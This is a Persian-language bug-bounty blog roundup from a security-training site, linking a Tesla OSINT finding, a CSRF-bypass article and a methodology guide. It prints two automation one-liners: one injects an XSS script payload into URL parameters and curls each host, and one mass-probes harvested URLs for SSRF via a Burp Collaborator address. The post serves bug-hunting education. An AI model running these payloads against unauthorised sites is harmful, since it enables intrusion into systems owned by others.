• صفحه اصلی
  • تامین امنیت سایت
  • آموزش جامع
    • کلوپ امنیت 1
    • کلوپ امنیت 2
    • کلوپ امنیت پیشرفته
    • دوره تست نفوذ api
    • دوره جامع osint
    • دوره متخصص pentest
    • دوره امنیت وردپرس
    • رایتاپخونه پلی برای کسب تجربه
    • دوره منتورینگ vip با بهروز منصوری
  • غیر رسمی
  • بلاگ
  • ارتباط با ما
 

ورود

رمز عبور را فراموش کرده اید؟

هنوز عضو نشده اید؟ عضویت در سایت
  • صفحه اصلی
  • تامین امنیت سایت
  • آموزش جامع
    • کلوپ امنیت 1
    • کلوپ امنیت 2
    • کلوپ امنیت پیشرفته
    • دوره تست نفوذ api
    • دوره جامع osint
    • دوره متخصص pentest
    • دوره امنیت وردپرس
    • رایتاپخونه پلی برای کسب تجربه
    • دوره منتورینگ vip با بهروز منصوری
  • غیر رسمی
  • بلاگ
  • ارتباط با ما
0

هنوز هیچ محصولی خریداری نکرده اید.

وبلاگ

مرزبان بلاگ غیر رسمی شماره 13 غیر رسمی

شماره 13 غیر رسمی

غیر رسمی
ارسال شده توسط بهروز منصوری
1402/09/03
190 بازدید

سلام بهروزم و با شماره 13 غیر رسمی در خدمتتون هستم.

غیر رسمی شماره 13 مربوط به تاریخ 27 آبان تا 3 آذر 1402 هستش.

 

 

آسیب پذیری Tesla

آسیب پذیری تسلا

زمانی که دوره جامع اوسینت را منتشر کردم خیلی از بچه ها پیام میدادن که آیا برای هک و امنیت هم مناسبه؟

ببینید اوسینت یک مهارته. مهارتی که می تونه در زمینه های مختلف کاربرد داشته باشه.

برای نمونه اینجا موردی را داریم که از اوسینت برای پیدا کردن یک آسیب پذیری در تسلا استفاده شده.

 

سلام بر عاشقان csrf

یه دوستی داشتم عاشق این آسیب پذیری بود. رضا اگر این مطلب رو داری می خونی سلام 🙂 

این مقاله خوراک افرادیه که می خوان از این آسیب پذیری استفاده کنن.

چون یاد مگیرن که با چه بایپس هایی می تونن برای این آسیب پذیری کار کنن.

 

اتوماتیک کردن فرایندها

یادتون باشه که خیلی از آسیب پذیری هارو میشه به صورت اتوماتیک بررسی کرد.

نه این که دیگه روش تست دستی رو ببوسیم و کنار بگذاریم.

ولی روش های اتوماتیک خیلی وقت ها جواب میدن.

برای نمونه برای آسیب پذیری xss این دستور:

cat file.txt | gf xss |
grep ‘source=’ | qsreplace
‘”><script>confirm(1)</script>’ | while read host do ; do
curl –silent –path-as-is –insecure “$host” | grep -qs
“<script>confirm(1)” && echo “$host
33[0;31mVulnerablen”;done

 

و برای آسیب پذیری ssrf از این دستور استفاده کنید:

findomain -t example.com -q | httpx -silent -threads 1000 | gau | grep “=” | qsreplace http://YOUR.burpcollaborator.net

 

وقتی می خوایم روی یه سایت کار کنیم از کجا شروع کنیم؟

این هفته هم مثل هفته گذشته بد نیست جواب یه سوال پر تکرار رو بدیم.

قبلاً چندین جا گفتم که شما باید برای خودتون یه متدولوژی داشته باشید.

این که مثلاً برای شروع چه کارهایی رو انجام بدید.

مثل یه مسیر که به ترتیب انجام بدید و تیک بزنید.

اینجا همون هانتر که مقاله گزارش باگ در واب رو گذاشته بود در موردش توضیح داده.

البته این پارت اول هستش و احتمالا در آینده پارت های بعدی رو قرار میده که کافیه از پروفایلش در medium بقیه رو دنبال کنید.

برچسب ها: cross site request forgerycsrfhack teslaosintowaspssrfteslaxssآسیب پذیریاوسینتتسلاهک

قدیمی تر رایتاپ بایپس پنل مدیریت شماره 1
جدیدتر رایتاپ Business Logic دسترسی به حساب مدیر

محصولات فروش ویژه
  • چطور با گزارش خوب در سایت‌های داخلی کسب درآمد کنیم؟
    کسب درآمد از طریق گزارش باگ در سایت‌های داخلی
  • دوره درک عمیق آسیب‌پذیری
    درک عمیق آسیب‌پذیری
  • مینی دوره مهندسی اجتماعی
    مینی دوره مهندسی اجتماعی
  • گزارش نویسی حرفه ای در باگ هانتینگ
    گزارش نویسی حرفه‌ای در Bug Hunting
دسته‌ها
  • رایتاپ
  • غیر رسمی
  • مقالات آموزشی
  • وبلاگ
  • ویدیوهای آموزشی
درباره ما

هدف از راه‌اندازی این سایت تلاش در جهت ورود شما به بازار کار است.افراد زیادی را میشناسیم که مشغول کارهای کارمندی هستند، شاید حتی پول نسبتا خوبی هم به دست میاورند ولی از کارشان لذت نمیبرند.

هدف ما اینجا این است که شما از کاری که علاقه‌ دارید و از انجام دادنش لذت می‌برید به صورت قانونی پول در بیاورید و نکته مهم اینجاست که حوزه هک و امنیت یک حوزه پولساز است به شرط این که راه درست را انتخاب کنید و از مسیر درست به دنبال نتیجه گرفتن باشید.

دسترسی سریع
  • دوره منتورینگ vip بهروز منصوری
  • کلوپ امنیت 1
  • کلوپ امنیت 2
  • کلوپ امنیت پیشرفته
  • دوره تست نفوذ api
  • دوره جامع اوسینت
  • دوره امنیت وردپرس
  • دوره متخصص pentest
  • رایتاپخونه
  • ارتباط با ما
  • تماس: 09126216410
  • ایمیل: mr.mansoori@yahoo.com

تمامی حقوق برای مرزبان محفوظ می باشد.

طراحی توسط مرزبان

در صورت نیاز به مشاوره می توانید فرم را تکمیل نمایید و یا با ما در ارتباط باشید.

جستجو

جستجو با زدن Enter و بستن با زدن ESC